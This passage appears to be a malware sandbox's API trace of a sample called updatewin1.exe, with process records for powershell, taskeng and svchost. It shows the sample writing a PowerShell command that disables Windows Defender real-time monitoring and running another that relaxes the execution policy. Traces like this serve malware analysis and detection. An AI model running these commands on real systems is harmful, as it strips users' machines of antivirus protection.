HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" --Admin" [0081.188] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x50d368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" [0081.189] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0081.209] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0081.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0081.210] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0081.211] lstrlenA (lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0081.211] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0081.211] CloseHandle (hObject=0xa8) returned 1 [0081.212] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x70) returned 0x50ecd8 [0081.213] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x90) returned 0x50ed50 [0081.213] SetLastError (dwErrCode=0x0) [0081.213] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0081.213] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessInformation=0x18d488*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x9f4, dwThreadId=0xa04)) returned 1 [0081.365] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.374] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.390] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.405] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.550] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.563] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.577] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.592] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.627] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.639] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.656] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.691] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.706] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.717] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.733] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.750] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.765] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.843] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.858] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.873] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.889] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.904] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.920] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.935] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.951] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.969] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.982] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0081.998] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.015] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.029] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.045] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.062] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.076] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.092] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.109] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.123] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.191] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.202] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.216] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.232] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.255] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.267] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.279] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.295] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.310] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.325] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.341] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.356] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.372] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.388] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.403] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.426] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.434] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.450] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.466] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.481] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.497] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.515] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.530] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.544] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.559] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.575] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.591] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.606] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.622] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.637] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.653] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.669] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.693] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.700] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.715] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.731] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.747] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.762] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.778] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.794] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.856] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.872] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.887] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.905] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.918] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.934] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.950] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.965] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.981] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0082.996] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.012] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.027] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.043] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.059] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.074] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.090] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.105] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.121] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.137] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.152] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.168] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.183] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.199] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.216] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.231] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.246] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.262] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.277] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.293] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.310] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.324] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.350] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.365] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.372] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.390] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.408] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.417] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.433] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.451] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.465] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.481] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.545] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.605] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.651] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.712] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.765] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.858] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.926] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0083.975] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.057] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.418] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.463] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.538] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.593] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.668] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.765] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.873] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.945] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0084.996] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.070] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.127] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.168] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.195] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.209] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.212] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0085.264] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0087.506] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0087.577] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0087.616] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.232] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.271] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.319] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.365] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.405] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.443] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.506] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.553] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.629] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.707] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.790] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.863] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.901] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.941] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0088.982] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.056] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.143] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.257] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.322] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.396] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.458] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.540] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.594] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.644] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.691] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.813] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.866] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0089.954] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0090.004] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0090.056] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0090.071] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0090.111] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0090.576] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0090.585] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0090.596] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.347] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.381] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0091.466] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0092.968] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.299] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.434] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.473] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.523] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.527] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.545] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.575] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.591] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.605] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.620] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.638] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.689] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.701] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.714] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.746] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.766] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.777] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.793] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.807] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.823] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.839] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.855] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.870] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.886] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.901] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.917] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.932] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.948] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.964] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.979] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0093.995] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.011] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.026] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.042] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.057] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.073] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.091] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.104] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.120] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.135] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.152] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.167] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.242] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0094.267] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0096.226] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0098.173] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0098.607] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) Process: id = "11" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x30ba9000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x9c4" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 57 os_tid = 0xa04 Thread: id = 58 os_tid = 0xa54 Thread: id = 59 os_tid = 0xa64 Thread: id = 60 os_tid = 0xa74 Process: id = "12" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x32f19000" os_pid = "0xa94" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "5" os_parent_pid = "0x370" cmd_line = "taskeng.exe {1B2898DB-83D1-45DC-B925-847C9B4BE496} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 62 os_tid = 0xaa4 Thread: id = 63 os_tid = 0xab4 Thread: id = 64 os_tid = 0xac4 Thread: id = 65 os_tid = 0xad4 Thread: id = 66 os_tid = 0xae4 Thread: id = 67 os_tid = 0xaf4 Thread: id = 68 os_tid = 0xb14 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8f04000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cc7d" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 69 os_tid = 0x7f8 Thread: id = 70 os_tid = 0x388 Thread: id = 71 os_tid = 0x514 Thread: id = 72 os_tid = 0x318 Thread: id = 73 os_tid = 0x638 Thread: id = 74 os_tid = 0x25c Thread: id = 75 os_tid = 0x794 Thread: id = 76 os_tid = 0x7a4 Thread: id = 77 os_tid = 0x6d0 Thread: id = 78 os_tid = 0x504 Thread: id = 79 os_tid = 0x7ac Thread: id = 80 os_tid = 0x630 Thread: id = 81 os_tid = 0x524 Thread: id = 82 os_tid = 0x64 Thread: id = 83 os_tid = 0x40c Thread: id = 84 os_tid = 0x798 Thread: id = 85 os_tid = 0x7dc Thread: id = 86 os_tid = 0x344 Thread: id = 87 os_tid = 0x7e8 Thread: id 